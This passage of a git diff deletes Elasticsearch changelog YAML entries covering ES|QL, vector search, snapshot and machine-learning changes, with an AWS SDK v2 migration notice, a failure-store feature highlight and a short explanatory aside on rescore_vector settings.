Learning -type: bug -issues: - - 104160 diff --git a/docs/changelog/125479.yaml b/docs/changelog/125479.yaml deleted file mode 100644 index efc31441254c5..0000000000000 --- a/docs/changelog/125479.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125479 -summary: ES|QL - Allow full text functions to be used in STATS -area: ES|QL -type: enhancement -issues: - - 125481 diff --git a/docs/changelog/125517.yaml b/docs/changelog/125517.yaml deleted file mode 100644 index 993a32960c876..0000000000000 --- a/docs/changelog/125517.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125517 -summary: Semantic Text Chunking Indexing Pressure -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/125520.yaml b/docs/changelog/125520.yaml deleted file mode 100644 index 71172b2137dc0..0000000000000 --- a/docs/changelog/125520.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125520 -summary: Add `FailedShardEntry` info to shard-failed task source string -area: Allocation -type: enhancement -issues: - - 102606 diff --git a/docs/changelog/125529.yaml b/docs/changelog/125529.yaml deleted file mode 100644 index b90327afa16d3..0000000000000 --- a/docs/changelog/125529.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125529 -summary: Store arrays offsets for boolean fields natively with synthetic source -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/125562.yaml b/docs/changelog/125562.yaml deleted file mode 100644 index 1e53662fabb7e..0000000000000 --- a/docs/changelog/125562.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125562 -summary: Improve handling of empty response -area: Infra/REST API -type: bug -issues: - - 57639 diff --git a/docs/changelog/125570.yaml b/docs/changelog/125570.yaml deleted file mode 100644 index ede177c666470..0000000000000 --- a/docs/changelog/125570.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125570 -summary: ES|QL random sampling -area: Machine Learning -type: feature -issues: [] diff --git a/docs/changelog/125599.yaml b/docs/changelog/125599.yaml deleted file mode 100644 index e0057f50dd937..0000000000000 --- a/docs/changelog/125599.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125599 -summary: Allow zero for `rescore_vector.oversample` to indicate by-passing oversample - and rescoring -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/125631.yaml b/docs/changelog/125631.yaml deleted file mode 100644 index 32917bb1da060..0000000000000 --- a/docs/changelog/125631.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125631 -summary: Add `documents_found` and `values_loaded` -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/125652.yaml b/docs/changelog/125652.yaml deleted file mode 100644 index 59a69964a0967..0000000000000 --- a/docs/changelog/125652.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125652 -summary: Run `TransportGetIndexAction` on local node -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/125690.yaml b/docs/changelog/125690.yaml deleted file mode 100644 index 00129675840a4..0000000000000 --- a/docs/changelog/125690.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125690 -summary: Take double parameter markers for identifiers out of snapshot -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/125699.yaml b/docs/changelog/125699.yaml deleted file mode 100644 index 29ee24da4c974..0000000000000 --- a/docs/changelog/125699.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125699 -summary: Adding `NormalizeForStreamProcessor` -area: Ingest Node -type: feature -issues: [] diff --git a/docs/changelog/125709.yaml 
b/docs/changelog/125709.yaml deleted file mode 100644 index 4979633208ceb..0000000000000 --- a/docs/changelog/125709.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125709 -summary: Store arrays offsets for unsigned long fields natively with synthetic source -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/125739.yaml b/docs/changelog/125739.yaml deleted file mode 100644 index cc5fa57b0f09b..0000000000000 --- a/docs/changelog/125739.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125739 -summary: Heuristics to pick efficient partitioning -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/125816.yaml b/docs/changelog/125816.yaml deleted file mode 100644 index aa43e2c766699..0000000000000 --- a/docs/changelog/125816.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125816 -summary: Use `FallbackSyntheticSourceBlockLoader` for point and `geo_point` -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/125832.yaml b/docs/changelog/125832.yaml deleted file mode 100644 index 4877a02e9e6d0..0000000000000 --- a/docs/changelog/125832.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125832 -summary: "ESQL: Fix `NULL` handling in `IN` clause" -area: ES|QL -type: bug -issues: - - 119950 diff --git a/docs/changelog/125896.yaml b/docs/changelog/125896.yaml deleted file mode 100644 index 92c2d2712f853..0000000000000 --- a/docs/changelog/125896.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125896 -summary: Support explicit Z/M attributes using WKT geometry -area: Geo -type: enhancement -issues: [123111] diff --git a/docs/changelog/125930.yaml b/docs/changelog/125930.yaml deleted file mode 100644 index 9bf7d18545772..0000000000000 --- a/docs/changelog/125930.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125930 -summary: Infer the score mode to use from the Lucene collector -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/126002.yaml b/docs/changelog/126002.yaml deleted file mode 100644 index 4879d38ab4675..0000000000000 --- a/docs/changelog/126002.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126002 -summary: Run `TransportGetLifecycleAction` on local node -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/126008.yaml b/docs/changelog/126008.yaml deleted file mode 100644 index e905bde32e433..0000000000000 --- a/docs/changelog/126008.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126008 -summary: Accumulate compute() calls and iterations between convergences -area: Allocation -type: enhancement -issues: - - 100850 diff --git a/docs/changelog/126009.yaml b/docs/changelog/126009.yaml deleted file mode 100644 index cd398938d1a1b..0000000000000 --- a/docs/changelog/126009.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126009 -summary: Change ModelLoaderUtils.split to return the correct number of chunks and ranges. 
-area: Machine Learning -type: bug -issues: - - 121799 diff --git a/docs/changelog/126035.yaml b/docs/changelog/126035.yaml deleted file mode 100644 index 1a96205e476e7..0000000000000 --- a/docs/changelog/126035.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126035 -summary: Fix top level knn search with scroll -area: Vector Search -type: bug -issues: [] diff --git a/docs/changelog/126038.yaml b/docs/changelog/126038.yaml deleted file mode 100644 index 65eabdb7937db..0000000000000 --- a/docs/changelog/126038.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126038 -summary: Mark `rescore_vector` as generally available -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/126051.yaml b/docs/changelog/126051.yaml deleted file mode 100644 index cffdb587b242c..0000000000000 --- a/docs/changelog/126051.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126051 -summary: Run `TransportGetSettingsAction` on local node -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/126087.yaml b/docs/changelog/126087.yaml deleted file mode 100644 index 94d5c5e0c28ba..0000000000000 --- a/docs/changelog/126087.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126087 -summary: Upgrade repository-gcs to use com.google.cloud:google-cloud-storage-bom:2.50.0 -area: Snapshot/Restore -type: upgrade -issues: [] diff --git a/docs/changelog/126091.yaml b/docs/changelog/126091.yaml deleted file mode 100644 index beba808c96fc6..0000000000000 --- a/docs/changelog/126091.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126091 -summary: Allow balancing weights to be set per tier -area: Allocation -type: enhancement -issues: [] diff --git a/docs/changelog/126237.yaml b/docs/changelog/126237.yaml deleted file mode 100644 index 24f245a528795..0000000000000 --- a/docs/changelog/126237.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126237 -summary: Use `FallbackSyntheticSourceBlockLoader` for text fields -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/126264.yaml b/docs/changelog/126264.yaml deleted file mode 100644 index e2c4c6e4a8695..0000000000000 --- a/docs/changelog/126264.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126264 -summary: '`FileWatchingService` should not throw for missing file' -area: Infra/Settings -type: enhancement -issues: [] diff --git a/docs/changelog/126296.yaml b/docs/changelog/126296.yaml deleted file mode 100644 index 55affb6ab4c79..0000000000000 --- a/docs/changelog/126296.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126296 -summary: Fail with 500 not 400 for `ValueExtractor` bugs -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/126314.yaml b/docs/changelog/126314.yaml deleted file mode 100644 index 8d16788f8b0c0..0000000000000 --- a/docs/changelog/126314.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126314 -summary: Add refresh to synonyms put / delete APIs to wait for synonyms to be accessible and reload analyzers -area: Analysis -type: bug -issues: - - 121441 diff --git a/docs/changelog/126319.yaml b/docs/changelog/126319.yaml deleted file mode 100644 index c8e84df61ad06..0000000000000 --- a/docs/changelog/126319.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126319 -summary: COMPLETION command grammar and logical plan -area: ES|QL -type: feature -issues: [] diff --git a/docs/changelog/126372.yaml b/docs/changelog/126372.yaml deleted file mode 100644 index 75345296d8392..0000000000000 --- a/docs/changelog/126372.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126372 -summary: Add `IndexingPressureMonitor` to monitor large indexing operations -area: CRUD -type: enhancement -issues: []
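The `rescore_vector` entries above (125599, which allows a zero `oversample` value to bypass oversampling and rescoring, and 126038, which marks the option generally available) both refer to a knob on the `dense_vector` mapping. As a minimal sketch only, not part of any deleted changelog, and assuming a hypothetical index `my-vectors` with a BBQ-quantized HNSW field, opting out of rescoring might look like this:

[source,yaml]
----
PUT my-vectors
{
  "mappings": {
    "properties": {
      "embedding": {
        "type": "dense_vector",
        "dims": 64,
        "index_options": {
          "type": "bbq_hnsw",
          "rescore_vector": {
            "oversample": 0
          }
        }
      }
    }
  }
}
----

A positive `oversample` multiplies the number of candidates gathered before they are rescored against the full-fidelity vectors; per the 125599 entry, `0` skips both the oversampling and the rescoring pass.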
diff --git a/docs/changelog/126385.yaml b/docs/changelog/126385.yaml deleted file mode 100644 index c59d1f15c6eae..0000000000000 --- a/docs/changelog/126385.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126385 -summary: Filter out empty top docs results before merging -area: Search -type: bug -issues: - - 126118 diff --git a/docs/changelog/126397.yaml b/docs/changelog/126397.yaml deleted file mode 100644 index 49e43ccf04a57..0000000000000 --- a/docs/changelog/126397.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126397 -summary: "ESQL: Preserve single aggregate when all attributes are pruned" -area: ES|QL -type: bug -issues: - - 126392 diff --git a/docs/changelog/126401.yaml b/docs/changelog/126401.yaml deleted file mode 100644 index 227a6c5a61795..0000000000000 --- a/docs/changelog/126401.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126401 -summary: Add pinned retriever -area: Relevance -type: enhancement -issues: [] diff --git a/docs/changelog/126409.yaml b/docs/changelog/126409.yaml deleted file mode 100644 index 7c5401faefa78..0000000000000 --- a/docs/changelog/126409.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126409 -summary: System data streams are not being upgraded in the feature migration API -area: Infra/Core -type: bug -issues: - - 122949 diff --git a/docs/changelog/126417.yaml b/docs/changelog/126417.yaml deleted file mode 100644 index 8fd456becacdb..0000000000000 --- a/docs/changelog/126417.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126417 -summary: Correctly handle nulls in nested paths in the remove processor -area: Ingest Node -type: bug -issues: [] diff --git a/docs/changelog/126452.yaml b/docs/changelog/126452.yaml deleted file mode 100644 index a67c1db5211d2..0000000000000 --- a/docs/changelog/126452.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126452 -summary: Run `newShardSnapshotTask` tasks concurrently -area: Snapshot/Restore -type: bug -issues: [] diff --git a/docs/changelog/126493.yaml b/docs/changelog/126493.yaml deleted file mode 100644 index 84a54b1058827..0000000000000 --- a/docs/changelog/126493.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126493 -summary: Bedrock Cohere Task Settings Support -area: Machine Learning -type: enhancement -issues: - - 126156 diff --git a/docs/changelog/126529.yaml b/docs/changelog/126529.yaml deleted file mode 100644 index e8beaf3fba4a9..0000000000000 --- a/docs/changelog/126529.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126529 -summary: "Batch ILM policy cluster state updates [#122917]" -area: ILM+SLM -type: enhancement -issues: - - 122917 diff --git a/docs/changelog/126532.yaml b/docs/changelog/126532.yaml deleted file mode 100644 index dff3094c31ad8..0000000000000 --- a/docs/changelog/126532.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126532 -summary: TO_IP can handle leading zeros -area: ES|QL -type: bug -issues: - - 125460 diff --git a/docs/changelog/126537.yaml b/docs/changelog/126537.yaml deleted file mode 100644 index 46ed789bd6768..0000000000000 --- a/docs/changelog/126537.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126537 -summary: Fix ELAND endpoints not updating dimensions -area: Machine Learning -type: bug -issues: [] diff --git a/docs/changelog/126550.yaml b/docs/changelog/126550.yaml deleted file mode 100644 index 3bc1e9332afcf..0000000000000 --- a/docs/changelog/126550.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126550 -summary: Add leniency to missing array values in mustache -area: Infra/Scripting -type: bug -issues: - - 55200 diff --git a/docs/changelog/126562.yaml b/docs/changelog/126562.yaml deleted file mode 100644 index a02ae0aacd018..0000000000000 --- 
a/docs/changelog/126562.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126562 -summary: Add a custom `toString` to `DynamicMap` -area: Infra/Scripting -type: bug -issues: - - 70262 diff --git a/docs/changelog/126578.yaml b/docs/changelog/126578.yaml deleted file mode 100644 index c65ef197e8a30..0000000000000 --- a/docs/changelog/126578.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126578 -summary: Retrieve token text only when necessary -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/126581.yaml b/docs/changelog/126581.yaml deleted file mode 100644 index 53fcb8a6057b3..0000000000000 --- a/docs/changelog/126581.yaml +++ /dev/null @@ -1,10 +0,0 @@ -pr: 126581 -summary: "Optimize shared blob cache evictions on shard removal - Shared blob cache evictions occur on the cluster applier thread when shards are - removed from a node. These can be expensive if a large number of shards are - being removed. This change uses the context of the removal to avoid unnecessary - evictions that might hold up the applier thread. - " -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/126594.yaml b/docs/changelog/126594.yaml deleted file mode 100644 index 59743a606d34a..0000000000000 --- a/docs/changelog/126594.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126594 -summary: Upgrade to Lucene 10.2.0 -area: Search -type: upgrade -issues: [] diff --git a/docs/changelog/126598.yaml b/docs/changelog/126598.yaml deleted file mode 100644 index 39187f0d60977..0000000000000 --- a/docs/changelog/126598.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126598 -summary: "ESQL: Retain aggregate when grouping" -area: ES|QL -type: bug -issues: - - 126026 diff --git a/docs/changelog/126612.yaml b/docs/changelog/126612.yaml deleted file mode 100644 index e8fd1825bfc2d..0000000000000 --- a/docs/changelog/126612.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126612 -summary: Add Support for Providing a custom `ServiceAccountTokenStore` through `SecurityExtensions` -area: Authentication -type: enhancement -issues: [] diff --git a/docs/changelog/126629.yaml b/docs/changelog/126629.yaml deleted file mode 100644 index 49d04856c0b64..0000000000000 --- a/docs/changelog/126629.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126629 -summary: Default new `semantic_text` fields to use BBQ when models are compatible -area: Relevance -type: enhancement -issues: [] diff --git a/docs/changelog/126641.yaml b/docs/changelog/126641.yaml deleted file mode 100644 index d99977d981acd..0000000000000 --- a/docs/changelog/126641.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126641 -summary: Push more `==`s on text fields to lucene -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/126644.yaml b/docs/changelog/126644.yaml deleted file mode 100644 index 05b1cbccbae1b..0000000000000 --- a/docs/changelog/126644.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126644 -summary: Add block loader from stored field and source for ip field -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/126653.yaml b/docs/changelog/126653.yaml deleted file mode 100644 index 1497aa7a40053..0000000000000 --- a/docs/changelog/126653.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126653 -summary: Retry shard movements during ESQL query -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/126687.yaml b/docs/changelog/126687.yaml deleted file mode 100644 index d140b67e36a49..0000000000000 --- a/docs/changelog/126687.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126687 -summary: Permit at+jwt typ header value in jwt access tokens -area: 
Authentication -type: enhancement -issues: - - 119370 diff --git a/docs/changelog/126702.yaml b/docs/changelog/126702.yaml deleted file mode 100644 index a6def67c08c6d..0000000000000 --- a/docs/changelog/126702.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126702 -summary: "Return float[] instead of List in `valueFetcher`" -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/126704.yaml b/docs/changelog/126704.yaml deleted file mode 100644 index 7f86594a05160..0000000000000 --- a/docs/changelog/126704.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126704 -summary: Add dense vector off-heap stats to Node stats and Index stats APIs -area: "Vector Search" -type: enhancement -issues: [] diff --git a/docs/changelog/126724.yaml b/docs/changelog/126724.yaml deleted file mode 100644 index 8c41d04ff7ae5..0000000000000 --- a/docs/changelog/126724.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126724 -summary: Fix painless return type cast for list shortcut -area: Infra/Scripting -type: bug -issues: [] diff --git a/docs/changelog/126751.yaml b/docs/changelog/126751.yaml deleted file mode 100644 index 05235c922d754..0000000000000 --- a/docs/changelog/126751.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126751 -summary: Allow float settings to be configured with other settings as default -area: Infra/Settings -type: enhancement -issues: [] diff --git a/docs/changelog/126770.yaml b/docs/changelog/126770.yaml deleted file mode 100644 index cc4bc2d1d842f..0000000000000 --- a/docs/changelog/126770.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126770 -summary: Remove empty results before merging -area: Search -type: bug -issues: - - 126742 diff --git a/docs/changelog/126786.yaml b/docs/changelog/126786.yaml deleted file mode 100644 index 0f7243324ed82..0000000000000 --- a/docs/changelog/126786.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126786 -summary: Account for time taken to write index buffers in `IndexingMemoryController` -area: Distributed -type: enhancement -issues: [] diff --git a/docs/changelog/126792.yaml b/docs/changelog/126792.yaml deleted file mode 100644 index 66e46fa59c433..0000000000000 --- a/docs/changelog/126792.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126792 -summary: Revert endpoint creation validation for ELSER and E5 -area: Machine Learning -type: bug -issues: [] diff --git a/docs/changelog/126803.yaml b/docs/changelog/126803.yaml deleted file mode 100644 index a0b2c6a4742a4..0000000000000 --- a/docs/changelog/126803.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126803 -summary: "[Security Solution] Add `read` index privileges to `kibana_system` role\ - \ for Microsoft Defender integration indexes" -area: Authorization -type: enhancement -issues: [] diff --git a/docs/changelog/126805.yaml b/docs/changelog/126805.yaml deleted file mode 100644 index 9051f775f698d..0000000000000 --- a/docs/changelog/126805.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126805 -summary: Adding timeout to request for creating inference endpoint -area: Machine Learning -type: bug -issues: [] diff --git a/docs/changelog/126840.yaml b/docs/changelog/126840.yaml deleted file mode 100644 index 53c899a575def..0000000000000 --- a/docs/changelog/126840.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126840 -summary: Fix `PolicyStepsRegistry` cache concurrency issue -area: ILM+SLM -type: bug -issues: - - 118406 diff --git a/docs/changelog/126843.yaml b/docs/changelog/126843.yaml deleted file mode 100644 index 1497f75b2ea74..0000000000000 --- a/docs/changelog/126843.yaml +++ /dev/null @@ -1,89 +0,0 @@ -pr: 126843 -summary: Upgrade `repository-s3` to AWS 
SDK v2 -area: Snapshot/Restore -type: breaking -issues: - - 120993 -highlight: - title: Upgrade `repository-s3` to AWS SDK v2 - body: >- - In earlier versions of {es} the `repository-s3` plugin was based on the AWS - SDK v1. AWS will withdraw support for this SDK before the end of the life - of {es} {minor-version} so we have migrated this plugin to the newer AWS SDK v2. - - The two SDKs are not quite compatible, so please check the breaking changes - documentation and test the new version thoroughly before upgrading any - production workloads. - notable: true -breaking: - title: Upgrade `repository-s3` to AWS SDK v2 - area: Cluster and node setting - details: >- - In earlier versions of {es} the `repository-s3` plugin was based on the AWS - SDK v1. AWS will withdraw support for this SDK before the end of the life - of {es} {minor-version} so we must migrate to the newer AWS SDK v2. - - Unfortunately there are several differences between the two AWS SDK - versions which may require you to adjust your system configuration when - upgrading to {es} {minor-version} or later. These differences include, but - may not be limited to, the following items. - - * AWS SDK v2 requires users to specify the region to use for signing - requests, or else to run in an environment in which it can determine the - correct region automatically. The older SDK would try to determine the - region based on the endpoint URL as specified with the - `s3.client.${CLIENT_NAME}.endpoint` setting, together with other data - drawn from the operating environment, and would ultimately fall back to - `us-east-1` if no better value could be found. - - * AWS SDK v2 does not support the EC2 IMDSv1 protocol. - - * AWS SDK v2 does not support the - `com.amazonaws.sdk.ec2MetadataServiceEndpointOverride` system property. - - * AWS SDK v2 does not permit specifying a choice between HTTP and HTTPS, so - the `s3.client.${CLIENT_NAME}.protocol` setting is deprecated. - - * AWS SDK v2 does not permit control over throttling for retries, so the - `s3.client.${CLIENT_NAME}.use_throttle_retries` setting is deprecated - and no longer has any effect. - - * AWS SDK v2 requires the use of the V4 signature algorithm, so the - `s3.client.${CLIENT_NAME}.signer_override` setting is deprecated and no - longer has any effect. - - * AWS SDK v2 does not support the `log-delivery-write` canned ACL. - - * AWS SDK v2 counts 4xx responses differently in its metrics reporting. - - * AWS SDK v2 always uses the regional STS endpoint, whereas AWS SDK v1 - could use either a regional endpoint or the global - `https://sts.amazonaws.com` one. - - impact: >- - If you use the `repository-s3` module, test your upgrade thoroughly before - upgrading any production workloads. - - Adapt your configuration to the new SDK functionality. This includes, but - may not be limited to, the following items. - - * Specify the correct signing region using the - `s3.client.${CLIENT_NAME}.region` setting on each node. {es} will try to - determine the correct region based on the endpoint URL and other data - drawn from the operating environment but cannot guarantee to do so - correctly in all cases. - - * If you use IMDS to determine the availability zone of a node or to obtain - credentials for accessing the EC2 API, ensure that it supports the IMDSv2 - protocol. - - * If applicable, discontinue use of the - `com.amazonaws.sdk.ec2MetadataServiceEndpointOverride` system property.
- - * If applicable, specify the protocol to use to access the S3 API by - setting `s3.client.${CLIENT_NAME}.endpoint` to a URL which starts with - `http://` or `https://`. - - * If applicable, discontinue use of the `log-delivery-write` canned ACL. - - notable: true diff --git a/docs/changelog/126856.yaml b/docs/changelog/126856.yaml deleted file mode 100644 index 5cc9bdc6946f6..0000000000000 --- a/docs/changelog/126856.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126856 -summary: "[ML] Integrate SageMaker with OpenAI Embeddings" -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/126866.yaml b/docs/changelog/126866.yaml deleted file mode 100644 index ff2e9d2ce03cb..0000000000000 --- a/docs/changelog/126866.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126866 -summary: Add recursive chunker -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/126876.yaml b/docs/changelog/126876.yaml deleted file mode 100644 index 895af10840d84..0000000000000 --- a/docs/changelog/126876.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126876 -summary: Improve HNSW filtered search speed through new heuristic -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/126935.yaml b/docs/changelog/126935.yaml deleted file mode 100644 index 7ef231ffa83c4..0000000000000 --- a/docs/changelog/126935.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126935 -summary: Synonyms API - Add refresh parameter to check synonyms index and reload analyzers -area: Analysis -type: enhancement -issues: - - 121441 diff --git a/docs/changelog/126956.yaml b/docs/changelog/126956.yaml deleted file mode 100644 index c8766bcdb9e67..0000000000000 --- a/docs/changelog/126956.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126956 -summary: Temporarily bypass competitive iteration for filters aggregation -area: Aggregations -type: bug -issues: [] diff --git a/docs/changelog/126973.yaml b/docs/changelog/126973.yaml deleted file mode 100644 index 9cd279e0f56a5..0000000000000 --- a/docs/changelog/126973.yaml +++ /dev/null @@ -1,89 +0,0 @@ -pr: 126973 -summary: Add ability to redirect ingestion failures on data streams to a failure store -area: Data streams -type: feature -issues: [] -highlight: - title: Add ability to redirect ingestion failures on data streams to a failure store - body: |- - Documents that encountered ingest pipeline failures or mapping conflicts - would previously be returned to the client as errors in the bulk and - index operations. Many client applications are not equipped to respond - to these failures. This leads to the failed documents often being - dropped by the client which cannot hold the broken documents - indefinitely. In many end user workloads, these failed documents - represent events that could be critical signals for observability or - security use cases. - - To help mitigate this problem, data streams can now maintain a "failure - store" which is used to accept and hold documents that fail to be - ingested due to preventable configuration errors. The data stream's - failure store operates like a separate set of backing indices with their - own mappings and access patterns that allow Elasticsearch to accept - documents that would otherwise be rejected due to unhandled ingest - pipeline exceptions or mapping conflicts. 
- - Users can enable redirection of ingest failures to the failure store on - new data streams by specifying it in the new `data_stream_options` field - inside of a component or index template: - - [source,yaml] - ---- - PUT _index_template/my-template - { - "index_patterns": ["logs-test-*"], - "data_stream": {}, - "template": { - "data_stream_options": { - "failure_store": { - "enabled": true - } - } - } - } - ---- - - Existing data streams can be configured with the new data stream - `_options` endpoint: - - [source,yaml] - ---- - PUT _data_stream/logs-test-apache/_options - { - "failure_store": { - "enabled": "true" - } - } - ---- - - When redirection is enabled, any ingestion related failures will be - captured in the failure store if the cluster is able to, along with the - timestamp that the failure occurred, details about the error - encountered, and the document that could not be ingested. Since failure - stores are a kind of Elasticsearch index, we can search the data stream - for the failures that it has collected. The failures are not shown by - default as they are stored in different indices than the normal data - stream data. In order to retrieve the failures, we use the `_search` API - along with a new bit of index pattern syntax, the `::` selector. - - [source,yaml] - ---- - POST logs-test-apache::failures/_search - ---- - - This index syntax informs the search operation to target the indices in - its failure store instead of its backing indices. It can be mixed in a - number of ways with other index patterns to include their failure store - indices in the search operation: - - [source,yaml] - ---- - POST logs-*::failures/_search - POST logs-*,logs-*::failures/_search - POST *::failures/_search - POST _query - { - "query": "FROM my_data_stream*::failures" - } - ---- - notable: true diff --git a/docs/changelog/127006.yaml b/docs/changelog/127006.yaml deleted file mode 100644 index fa41bce2791f6..0000000000000 --- a/docs/changelog/127006.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127006 -summary: Correctly handle non-integers in nested paths in the remove processor -area: Ingest Node -type: bug -issues: [] diff --git a/docs/changelog/127118.yaml b/docs/changelog/127118.yaml deleted file mode 100644 index cf3bd807d4a2d..0000000000000 --- a/docs/changelog/127118.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127118 -summary: Panama vector accelerated optimized scalar quantization -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/127134.yaml b/docs/changelog/127134.yaml deleted file mode 100644 index 97d6de2f99878..0000000000000 --- a/docs/changelog/127134.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127134 -summary: Define a default oversample value for dense vectors with bbq_hnsw/bbq_flat -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/127139.yaml b/docs/changelog/127139.yaml deleted file mode 100644 index 29190073fb152..0000000000000 --- a/docs/changelog/127139.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127139 -summary: Add `suggested_cast` -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127148.yaml b/docs/changelog/127148.yaml deleted file mode 100644 index db98b21a944b2..0000000000000 --- a/docs/changelog/127148.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127148 -summary: Skip unused STATS groups by adding a Top N `BlockHash` implementation -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127199.yaml b/docs/changelog/127199.yaml deleted file mode 100644 index e6b3710f7e97c..0000000000000
